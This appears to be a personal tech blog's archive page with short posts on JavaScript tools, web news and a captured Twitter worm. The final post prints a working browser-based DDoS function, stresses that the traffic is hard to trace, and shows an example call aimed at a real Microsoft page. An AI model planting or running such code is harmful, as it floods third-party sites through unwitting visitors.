Archive for the ‘Uncategorized’ Category

Blog moved

Sunday, August 12th, 2012

I’m now writing at marcuswest.in. See you there!

TC MSFT Marketing fail roundup

Wednesday, August 26th, 2009

TechCrunch created a MSFT marketing-fail photoshop meme, with lots of awesome entries.

Check out a collage of the results at http://narcvs.com/MemeSFT

Good labor makes … makes good nights

Tuesday, August 25th, 2009

I love my friends

What comes of good nights?

TechCrunch is my new IM client

Tuesday, August 25th, 2009

I spend much of my time reading news. On TechCrunch.

I spend much of my time chatting with people. On Meebo.

Now I can have them both - reading news On Tehcrunch, while chatting on their Meebo Bar.

Since the Meebo Bar launch on TechCrunch.com this morning, people have started sharing quite a bit, and I have made my own Fluid TechCrunch application. There, I can read all my news while I discuss and share them with my friends. In short, TechCrunch is my new IM client.

Now if I only got realtime notifications every time TechCrunch posted a new article…

More info at http://business.meebo.com/!

Wanna dissect a Twitter virus?

Saturday, May 30th, 2009

I grabbed the source of the recent “Best Video” Twitter virus.

It’s stashed away at http://narcvs.com/security/best_video_virus.js if you care to have a look.

Pretty intricate stuff - would love to have a look at the obfuscation engine they use.

Twitter search adds expansion of tinied URLs

Saturday, March 14th, 2009

Since Twitter enforces a 140 character limit, long URLs are often shortened using any of many “tiny url providers” (TinyURL, tr.im, shorl…)

The problem with the tiny url’s is that you can’t see where they lead from looking at the address. A number of services have emerged to solve this problem, such asĀ untiny and the Ubiquity command.

However, these are solutions are really just workarounds to a central of Twitter’s - and Twitter is stepping up to address it!

I just noticed that in Twitter search, they append an “expand link” right after tiny url’s. I would expect them to either add this option around their site, or optionally auto-expand tiny urls for you.

Screenshots:

After clicking the expand link:

Nice work Twitter!

FormLess - style agnostic and auto-validating forms

Thursday, January 1st, 2009

Creating HTML forms can be a drag. Validating the form input is even worse. I wrote up a javascript utility to demonstrate how easy and enjoyable it could (should) be to create forms. Check out the demo. You create a form with:

new FormLess('form-container-element-id', items);

where items is an array of objects. Each item requires at least a name and a type, but could also take an array of options or a validation function that gets called to validate the value of that item.

items = [{
  name : 'Gender',
  type : 'select',
  options : ['None of your business', 'Male', 'Female'],
  validate : function(data) {
    return data && data != 'None of your business'
  }
}]

Each time an item’s value changes, the validation function gets called for that item. If a validation function returns false, the item gets marked as invalid. Valid and invalid items can be styled however you please:

.valid {
  background-color : green;
}

.invalid {
  background-color : red;
}

When the form is submitted, each item gets has its validation function called. If all validation functions pass, the submit function gets called along with a key-value object containing the items names and values. This tool has not been tested across browsers - it’s mostly a demonstration of how easy it should be to gather and handle user-entered data. Check out the demo Screenshot of FormLess demo application

Ajaxlights: Genetic alg with JS, CSS spriting (incl IE6+PNG), Distributed computing with JS & Open source AIR

Saturday, December 27th, 2008

Genetic algorithms allow for the best performing solutions to stand out. SnapAds uses genetic algorithms to improve performance of ads. Greg Dingle hosts an open source JS library for evolution of UIs, genetify over at github (definitely check out the genetify demo).

CSS spriting allows for you to download all your images with a single HTTP request. Jennifer Semtner has a great writeup for a cross-browser, PNG compatible spriting solution.

Distributed computing is hot. Enter stage: JS. While browsing the web, you can donate spare CPU cycles to computing projects. Joose has built a JS implementation for distributed computing using app engine and gears. Like SETI screensavers but waaaay cooler.

The appcelerator team has built an open source AIR-style web-to-desktop app builder called Titanium!

Ajaxlights - SQL via JSONP, ECMAScript 4 (now!), Bayjax meetup, YUI Js doc, and JS Turtle drawing

Wednesday, December 24th, 2008

Yahoo has created a JSONP REST interface for sql-like search queries of Yahoo and generic web data, YQL. (JSONP services are totally going to be the de-facto solution to cross-domain communication).

Mascara released beta 4. This is a project to convert ECMAScript 4 to javascript that current browsers understant - definitely keep an eye on Mascara.

There’s a new javascript meetup for the bay area - Bayjax, started and run by Uri who has worked with Aptana. Do check it out!

YUI release YUI Doc, a purely comment-based documentation library. Written in Python, it seems to be the only active documentation tool project for js out there. Do we need a JS doc tool? I’m not sure…

And last, something nostalgic: The number of developers that were introduced to our art through turtle drawing must be significant. Now you can draw your own very favorite turtle drawings in JS thanks to canvas turtle!

DDoS a la Ajax

Monday, December 1st, 2008

Q: What’s the difference between a botnet and a popular web service?

A: The web service can only attack port 80.

Imagine a web site with a million simultaneous users. Then imagine putting the following snippet on each of their page views:

function ddosAttack(url, timeLeft, times) {
  times = times || 1;
  window.setTimeout(function() {
    while (times--) {
      var script = document.createElement('script');
      script.src = url + (url.match(/\?/) ? '&' : '?') + Math.ceil(Math.random() * 10000);
      document.getElementsByTagName('head')[0].appendChild(script);
    }
  }, timeLeft);
}

Voila - point the url towards a web page with reasonably heavy html content, and your 1 million users should be able to bring it down reasonably easily. Turn it on, launch attack, turn it off.

Without the help of a tech-savy user with http analyzer or firebug watching traffic closely, the victim will not be able to trace the attack to your website.

It is also virtually impossible to distinguish the attack traffic from legitimate traffic.

While the issue of botnet attacks is not a new one, the threshold of participation is significantly lower for a website than with malware. Simply clicking that link is enough.

Add widgets to the mix, and it gets even uglier.

What would an attack look like? Maybe something like:

ddosAttack('http://www.microsoft.com/windows/ie/ie6/downloads/default.mspx', 1000, 10);